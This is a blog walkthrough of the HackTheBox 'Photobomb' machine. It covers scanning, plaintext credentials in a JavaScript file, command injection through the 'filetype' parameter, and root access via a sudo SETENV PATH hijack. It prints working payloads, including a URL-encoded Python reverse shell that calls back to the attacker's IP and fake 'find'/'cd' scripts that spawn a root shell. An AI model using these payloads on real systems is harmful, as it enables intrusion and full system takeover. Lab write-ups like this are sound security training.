<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>Photobomb | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/photobomb/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/photobomb/><link rel=prev href=https://h4r1337.github.io/posts/ambassador/><link rel=next href=https://h4r1337.github.io/posts/precious/><meta name=description content="In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive"><meta name=keywords content="HTB,hackthebox,Writeup,Walkthrough,photobomb,RCE,Beginners,Easy,Linux,setenv-abuse,path-injection"><meta property="og:url" content="https://h4r1337.github.io/posts/photobomb/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="Photobomb | HackTheBox"><meta property="og:description" content="In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive"><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2023-02-12T00:07:40+05:30"><meta property="article:modified_time" content="2023-02-12T00:07:40+05:30"><meta property="article:tag" content="HackTheBox"><meta property="article:tag" content="Linux"><meta property="article:tag" content="Easy"><meta property="article:tag" content="RCE"><meta property="article:tag" content="Setenv-Abuse"><meta property="article:tag" content="Path-Hijack"><meta property="og:image" content="https://h4r1337.github.io/img/photobomb/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/resource/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/permx/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/blurry/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/board-light/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/perfection/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/two-million/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/precious/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/photobomb/cover.webp"><meta name=twitter:title content="Photobomb | HackTheBox"><meta name=twitter:description content="In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive"><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.2480d733c3cd78de5d135eb2d8c0b0f964b2bf1e047d180f4f363bdcc3b23b20.css integrity="sha256-JIDXM8PNeN5dE16y2MCw+WSyvx4EfRgPTzY73MOyOyA="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/hackthebox/ class=tag>HACKTHEBOX</a>
,
<a href=https://h4r1337.github.io/tags/linux/ class=tag>LINUX</a>
,
<a href=https://h4r1337.github.io/tags/easy/ class=tag>EASY</a>
,
<a href=https://h4r1337.github.io/tags/rce/ class=tag>RCE</a>
,
<a href=https://h4r1337.github.io/tags/setenv-abuse/ class=tag>SETENV-ABUSE</a>
,
<a href=https://h4r1337.github.io/tags/path-hijack/ class=tag>PATH-HIJACK</a></span></div><h1 class=header-title itemprop=headline>Photobomb | HackTheBox</h1><div class=post-meta><time datetime="2023-02-12 00:07:40 +0530 +0530" itemprop=datePublished>2023-02-12
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2023-02-12 00:07:40 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/photobomb/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/Photobomb>photobomb</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Easy</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Linux</td></tr><tr><td style=text-align:center>Maker</td><td style=text-align:center><a href=https://app.hackthebox.com/users/85231><img src=https://www.hackthebox.com/badge/image/85231 alt style=display:unset></a></td></tr></tbody></table><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About Photobomb</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scanned all TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> nmap -p- -T4 --min-rate <span style=color:#d3869b>10000</span> -oA nmap/ports 10.10.11.182
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> photobomb.htb <span style=color:#fe8019>(</span>10.10.11.182<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.56s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>65489</span> filtered ports, <span style=color:#d3869b>44</span> closed ports
</span></span><span style=display:flex><span>PORT   STATE SERVICE
</span></span><span style=display:flex><span>22/tcp open  ssh
</span></span><span style=display:flex><span>80/tcp open  http
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># Nmap done at Sat Jan 21 11:44:06 2023 -- 1 IP address (1 host up) scanned in 74.49 seconds</span>
</span></span></code></pre></div><p>Enumerated open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> nmap -sC -sV 10.10.11.182 -oA nmap/service
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Starting Nmap 7.80 <span style=color:#fe8019>(</span> https://nmap.org <span style=color:#fe8019>)</span> at 2023-01-21 11:44 IST
</span></span><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> photobomb.htb <span style=color:#fe8019>(</span>10.10.11.182<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.52s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>995</span> closed ports
</span></span><span style=display:flex><span>PORT      STATE    SERVICE  VERSION
</span></span><span style=display:flex><span>22/tcp    open     ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 <span style=color:#fe8019>(</span>Ubuntu Linux; protocol 2.0<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>80/tcp    open     http     nginx 1.18.0 <span style=color:#fe8019>(</span>Ubuntu<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>|_http-server-header: nginx/1.18.0 <span style=color:#fe8019>(</span>Ubuntu<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>163/tcp   filtered cmip-man
</span></span><span style=display:flex><span>8649/tcp  filtered unknown
</span></span><span style=display:flex><span>10025/tcp filtered unknown
</span></span><span style=display:flex><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style=display:flex><span>Nmap <span style=color:#fe8019>done</span>: <span style=color:#d3869b>1</span> IP address <span style=color:#fe8019>(</span><span style=color:#d3869b>1</span> host up<span style=color:#fe8019>)</span> scanned in 120.20 seconds
</span></span></code></pre></div><h3 id=port-80---http-nginx-1180><a href=#port-80---http-nginx-1180 class=anchor-head aria-label=Anchor></a>Port 80 - HTTP (Nginx 1.18.0)</h3><figure><img src=/img/photobomb/Pasted%20image%2020230121115108.webp></figure><p>There&rsquo;s a printer directory which requires some credentials to access.</p><figure><img src=/img/photobomb/Pasted%20image%2020230121115159.webp></figure><p>There&rsquo;s a javascript file <code>photobomb.js</code> and inside that there was the username & password in plain text.</p><figure><img src=/img/photobomb/Pasted%20image%2020230121115318.webp></figure><ul><li>username: <code>pH0t0</code></li><li>password: <code>b0Mb!</code></li></ul><figure><img src=/img/photobomb/Pasted%20image%2020230121115439.webp></figure><p>We can download images with various aspect ratio from this page. The request is like this:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=display:flex><span><span style=color:#fabd2f>POST</span> /printer <span style=color:#fe8019>HTTP</span><span style=color:#fe8019>/</span><span style=color:#d3869b>1.1</span>
</span></span><span style=display:flex><span>Host<span style=color:#fe8019>:</span> photobomb.htb
</span></span><span style=display:flex><span>User-Agent<span style=color:#fe8019>:</span> Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
</span></span><span style=display:flex><span>Accept<span style=color:#fe8019>:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
</span></span><span style=display:flex><span>Accept-Language<span style=color:#fe8019>:</span> en-US,en;q=0.5
</span></span><span style=display:flex><span>Accept-Encoding<span style=color:#fe8019>:</span> gzip, deflate
</span></span><span style=display:flex><span>Content-Type<span style=color:#fe8019>:</span> application/x-www-form-urlencoded
</span></span><span style=display:flex><span>Content-Length<span style=color:#fe8019>:</span> 78
</span></span><span style=display:flex><span>Origin<span style=color:#fe8019>:</span> http://photobomb.htb
</span></span><span style=display:flex><span>Authorization<span style=color:#fe8019>:</span> Basic cEgwdDA6YjBNYiE=
</span></span><span style=display:flex><span>Connection<span style=color:#fe8019>:</span> keep-alive
</span></span><span style=display:flex><span>Referer<span style=color:#fe8019>:</span> http://photobomb.htb/prin
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;filetype=jpg&amp;dimensions=3000x2000
</span></span></code></pre></div><p>I tried changing <code>photo</code> parameter to <code>../../../../../../etc/passwd</code> and it throws an error:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=display:flex><span><span style=color:#fabd2f>POST</span> /printer <span style=color:#fe8019>HTTP</span><span style=color:#fe8019>/</span><span style=color:#d3869b>1.1</span>
</span></span><span style=display:flex><span>Host<span style=color:#fe8019>:</span> photobomb.htb
</span></span><span style=display:flex><span>User-Agent<span style=color:#fe8019>:</span> Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
</span></span><span style=display:flex><span>Accept<span style=color:#fe8019>:</span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
</span></span><span style=display:flex><span>Accept-Language<span style=color:#fe8019>:</span> en-US,en;q=0.5
</span></span><span style=display:flex><span>Accept-Encoding<span style=color:#fe8019>:</span> gzip, deflate
</span></span><span style=display:flex><span>Referer<span style=color:#fe8019>:</span> http://photobomb.htb/printer
</span></span><span style=display:flex><span>Content-Length<span style=color:#fe8019>:</span> 65
</span></span><span style=display:flex><span>Origin<span style=color:#fe8019>:</span> http://photobomb.htb
</span></span><span style=display:flex><span>Connection<span style=color:#fe8019>:</span> keep-alive
</span></span><span style=display:flex><span>Upgrade-Insecure-Requests<span style=color:#fe8019>:</span> 1
</span></span><span style=display:flex><span>Content-Type<span style=color:#fe8019>:</span> application/x-www-form-urlencoded
</span></span><span style=display:flex><span>Authorization<span style=color:#fe8019>:</span> Basic cEgwdDA6YjBNYiE=
</span></span><span style=display:flex><span>Pragma<span style=color:#fe8019>:</span> no-cache
</span></span><span style=display:flex><span>Cache-Control<span style=color:#fe8019>:</span> no-cache
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>photo=../../../../../../etc/passwd&amp;filetype=&amp;dimensions=3000x2000
</span></span></code></pre></div><p>which results in an error:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-http data-lang=http><span style=display:flex><span><span style=color:#fe8019>HTTP</span><span style=color:#fe8019>/</span><span style=color:#d3869b>1.1</span> <span style=color:#d3869b>500</span> <span style=color:#fb4934>Internal Server Error</span>
</span></span><span style=display:flex><span>Server<span style=color:#fe8019>:</span> nginx/1.18.0 (Ubuntu)
</span></span><span style=display:flex><span>Date<span style=color:#fe8019>:</span> Sat, 21 Jan 2023 06:28:14 GMT
</span></span><span style=display:flex><span>Content-Type<span style=color:#fe8019>:</span> text/html;charset=utf-8
</span></span><span style=display:flex><span>Content-Length<span style=color:#fe8019>:</span> 14
</span></span><span style=display:flex><span>Connection<span style=color:#fe8019>:</span> keep-alive
</span></span><span style=display:flex><span>X-Xss-Protection<span style=color:#fe8019>:</span> 1; mode=block
</span></span><span style=display:flex><span>X-Content-Type-Options<span style=color:#fe8019>:</span> nosniff
</span></span><span style=display:flex><span>X-Frame-Options<span style=color:#fe8019>:</span> SAMEORIGIN
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Invalid photo.
</span></span></code></pre></div><hr><h2 id=exploitation><a href=#exploitation class=anchor-head aria-label=Anchor></a>Exploitation</h2><h3 id=rce-on-filetype-parameter><a href=#rce-on-filetype-parameter class=anchor-head aria-label=Anchor></a>RCE on <code>filetype</code> parameter</h3><p>I tried adding RCE payloads to all parameters and <code>filetype</code> parameter is vulnerable to RCE. We can test it by combining <code>python</code> and <code>curl</code>:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> python3 -m http.server <span style=color:#d3869b>8081</span>
</span></span><span style=display:flex><span>Serving HTTP on 0.0.0.0 port <span style=color:#d3869b>8081</span> <span style=color:#fe8019>(</span>http://0.0.0.0:8081/<span style=color:#fe8019>)</span> ...
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl <span style=color:#b8bb26>&#39;http://photobomb.htb/printer&#39;</span> -X POST -H <span style=color:#b8bb26>&#39;Authorization: Basic cEgwdDA6YjBNYiE=&#39;</span> --data-raw <span style=color:#b8bb26>&#39;photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;filetype=jpg;curl+http://10.10.14.35:8081/&amp;dimensions=3000x2000&#39;</span>
</span></span></code></pre></div><p>And we got connection from the server:</p><figure><img src=/img/photobomb/Pasted%20image%2020230121121051.webp></figure><p>I went to <a href=revshells.com>revshells</a> and generated the <code>Python3 #1</code> reverse shell with my IP and port. Make sure it is <strong>URL-encoded</strong>.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl <span style=color:#b8bb26>&#39;http://photobomb.htb/printer&#39;</span> -X POST -H <span style=color:#b8bb26>&#39;Authorization: Basic cEgwdDA6YjBNYiE=&#39;</span> --data-raw <span style=color:#b8bb26>&#39;photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;filetype=jpg;export%20RHOST%3D%2210.10.14.35%22%3Bexport%20RPORT%3D1234%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22bash%22%29%27&amp;dimensions=3000x2000&#39;</span>
</span></span></code></pre></div><p>We got a shell as user <code>wizard</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> nc -lnvp <span style=color:#d3869b>1234</span>
</span></span><span style=display:flex><span>Listening on 0.0.0.0 <span style=color:#d3869b>1234</span>
</span></span><span style=display:flex><span>Connection received on 10.10.11.182 <span style=color:#d3869b>59550</span>
</span></span><span style=display:flex><span>wizard@photobomb:~/photobomb$ id
</span></span><span style=display:flex><span>id
</span></span><span style=display:flex><span>uid<span style=color:#fe8019>=</span>1000<span style=color:#fe8019>(</span>wizard<span style=color:#fe8019>)</span> gid<span style=color:#fe8019>=</span>1000<span style=color:#fe8019>(</span>wizard<span style=color:#fe8019>)</span> groups<span style=color:#fe8019>=</span>1000<span style=color:#fe8019>(</span>wizard<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>wizard@photobomb:~/photobomb$ whoami
</span></span><span style=display:flex><span>whoami
</span></span><span style=display:flex><span>wizard
</span></span><span style=display:flex><span>wizard@photobomb:~/photobomb$ <span style=color:#fabd2f>pwd</span>
</span></span><span style=display:flex><span><span style=color:#fabd2f>pwd</span>
</span></span><span style=display:flex><span>/home/wizard/photobomb
</span></span></code></pre></div><hr><h2 id=privilege-escalation><a href=#privilege-escalation class=anchor-head aria-label=Anchor></a>Privilege Escalation</h2><h3 id=privilege-escalation-vector><a href=#privilege-escalation-vector class=anchor-head aria-label=Anchor></a>Privilege Escalation vector</h3><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>wizard@photobomb:~/photobomb$ sudo -l
</span></span><span style=display:flex><span>sudo -l
</span></span><span style=display:flex><span>Matching Defaults entries <span style=color:#fe8019>for</span> wizard on photobomb:
</span></span><span style=display:flex><span>    env_reset, mail_badpass,
</span></span><span style=display:flex><span>    secure_path<span style=color:#fe8019>=</span>/usr/local/sbin<span style=color:#b8bb26>\:</span>/usr/local/bin<span style=color:#b8bb26>\:</span>/usr/sbin<span style=color:#b8bb26>\:</span>/usr/bin<span style=color:#b8bb26>\:</span>/sbin<span style=color:#b8bb26>\:</span>/bin<span style=color:#b8bb26>\:</span>/snap/bin
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>User wizard may run the following commands on photobomb:
</span></span><span style=display:flex><span>    <span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span> SETENV: NOPASSWD: /opt/cleanup.sh
</span></span></code></pre></div><p><code>SETENV</code> directive is set. So we can change the <code>PATH</code> variable and run the script with root access. If you want to know more about this attack, check out:</p><ul><li><a href=https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/>hackingarticles.in</a></li><li><a href=https://book.hacktricks.xyz/linux-hardening/privilege-escalation#setenv>hacktricks.xyz</a></li></ul><p><code>/opt/cleanup.sh :</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span><span style=color:#8ec07c>#!/bin/bash
</span></span></span><span style=display:flex><span><span style=color:#8ec07c></span>. /opt/.bashrc
</span></span><span style=display:flex><span><span style=color:#fabd2f>cd</span> /home/wizard/photobomb
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># clean up log files</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>if</span> <span style=color:#fe8019>[</span> -s log/photobomb.log <span style=color:#fe8019>]</span> <span style=color:#fe8019>&amp;&amp;</span> ! <span style=color:#fe8019>[</span> -L log/photobomb.log <span style=color:#fe8019>]</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>then</span>
</span></span><span style=display:flex><span>  /bin/cat log/photobomb.log &gt; log/photobomb.log.old
</span></span><span style=display:flex><span>  /usr/bin/truncate -s0 log/photobomb.log
</span></span><span style=display:flex><span><span style=color:#fe8019>fi</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#928374;font-style:italic># protect the priceless originals</span>
</span></span><span style=display:flex><span>find source_images -type f -name <span style=color:#b8bb26>&#39;*.jpg&#39;</span> -exec chown root:root <span style=color:#fe8019>{}</span> <span style=color:#b8bb26>\;</span>
</span></span></code></pre></div><p>Here they are using full path for the commands <code>cat</code> and <code>truncate</code> but not for <code>cd</code> and <code>find</code>. So we can create files named either <code>cd</code> or <code>find</code> and the current working directory to the path. When the script <code>cleanup.sh</code> will execute with the updated path it will execute the <code>cd</code> and <code>find</code> we created instead of the original ones.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>wizard@photobomb:~$ <span style=color:#fabd2f>echo</span> -e <span style=color:#b8bb26>&#39;#!/bin/bash\nbash&#39;</span> &gt; <span style=color:#fabd2f>cd</span>
</span></span><span style=display:flex><span><span style=color:#fabd2f>echo</span> -e <span style=color:#b8bb26>&#39;#!/bin/bash\nbash&#39;</span> &gt; <span style=color:#fabd2f>cd</span>
</span></span><span style=display:flex><span>wizard@photobomb:~$ <span style=color:#fabd2f>echo</span> -e <span style=color:#b8bb26>&#39;#!/bin/bash\nbash&#39;</span> &gt; find
</span></span><span style=display:flex><span><span style=color:#fabd2f>echo</span> -e <span style=color:#b8bb26>&#39;#!/bin/bash\nbash&#39;</span> &gt; find
</span></span><span style=display:flex><span>wizard@photobomb:~$ chmod +x <span style=color:#fabd2f>cd</span> find
</span></span><span style=display:flex><span>chmod +x <span style=color:#fabd2f>cd</span> find
</span></span></code></pre></div><p>And either the <code>cd</code> or the <code>find</code> script will give us root shell.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>wizard@photobomb:~$ sudo PATH<span style=color:#fe8019>=</span>$PWD:$PATH /opt/cleanup.sh
</span></span><span style=display:flex><span>sudo PATH<span style=color:#fe8019>=</span>$PWD:$PATH /opt/cleanup.sh
</span></span><span style=display:flex><span>root@photobomb:/home/wizard/photobomb# id
</span></span><span style=display:flex><span>id
</span></span><span style=display:flex><span>uid<span style=color:#fe8019>=</span>0<span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span> gid<span style=color:#fe8019>=</span>0<span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span> groups<span style=color:#fe8019>=</span>0<span style=color:#fe8019>(</span>root<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>root@photobomb:/home/wizard/photobomb# whoami
</span></span><span style=display:flex><span>whoami
</span></span><span style=display:flex><span>root
</span></span></code></pre></div></div></article></main><aside id=sticky-top><div class=toc-title><p>Photobomb | HackTheBox</p><hr id=toc-hr></div><nav id=toc class=toc-container><nav id=TableOfContents><ul><li><ul><li><a href=#overview>Overview</a></li></ul></li><li><a href=#information-gathering>Information Gathering</a><ul><li><a href=#port-80---http-nginx-1180>Port 80 - HTTP (Nginx 1.18.0)</a></li></ul></li><li><a href=#exploitation>Exploitation</a><ul><li><a href=#rce-on-filetype-parameter>RCE on <code>filetype</code> parameter</a></li></ul></li><li><a href=#privilege-escalation>Privilege Escalation</a><ul><li><a href=#privilege-escalation-vector>Privilege Escalation vector</a></li></ul></li></ul></nav></nav></aside><small class=post-updated-at>updated at 2023-02-12</small><hr><div class=series-nav><div class="alert alert-note"><div class=alert-heading-box><a href=https://h4r1337.github.io/series/hack-the-box/><p class=alert-heading>Hack the Box Series</p></a></div></div><nav class=post-nav style=margin-top:1rem;border-top:none><a class="post-nav-item post-nav-prev" href=https://h4r1337.github.io/posts/ambassador/><div class=nav-arrow>Previous in series</div><span class=post-title>Ambassador | HackTheBox</span>
